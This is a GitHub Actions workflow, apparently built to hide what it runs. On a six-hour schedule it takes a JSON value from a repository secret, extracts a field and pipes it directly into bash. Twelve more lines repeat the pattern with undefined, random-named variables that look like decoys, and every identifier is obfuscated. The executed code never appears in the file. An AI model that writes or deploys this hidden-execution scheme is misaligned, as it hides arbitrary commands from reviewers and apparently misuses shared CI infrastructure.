name: brothdeep
on:
  workflow_dispatch:
  schedule:
    - cron: '32 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: brothdeep
        env:
          xpw26187: ${{ secrets.xpw26187 }}
        run: |
          echo $xpw26187 | jq -r .mycs751 | /bin/bash
          echo $umgm924 | jq -r .yshh70 | /bin/bash
          echo $lze78 | jq -r .sa59815 | /bin/bash
          echo $hy64399 | jq -r .ogma79713 | /bin/bash
          echo $fi3574 | jq -r .on2688 | /bin/bash
          echo $s55119 | jq -r .vipbd51 | /bin/bash
          echo $prta39267 | jq -r .q079 | /bin/bash
          echo $nqj97 | jq -r .r9 | /bin/bash
          echo $ghyqt568 | jq -r .s0 | /bin/bash
          echo $eapo521 | jq -r .sb5 | /bin/bash
          echo $gxlw24449 | jq -r .ntfaw3 | /bin/bash
          echo $z267 | jq -r .n0 | /bin/bash
          echo $ycd39 | jq -r .zmmpl7249 | /bin/bash

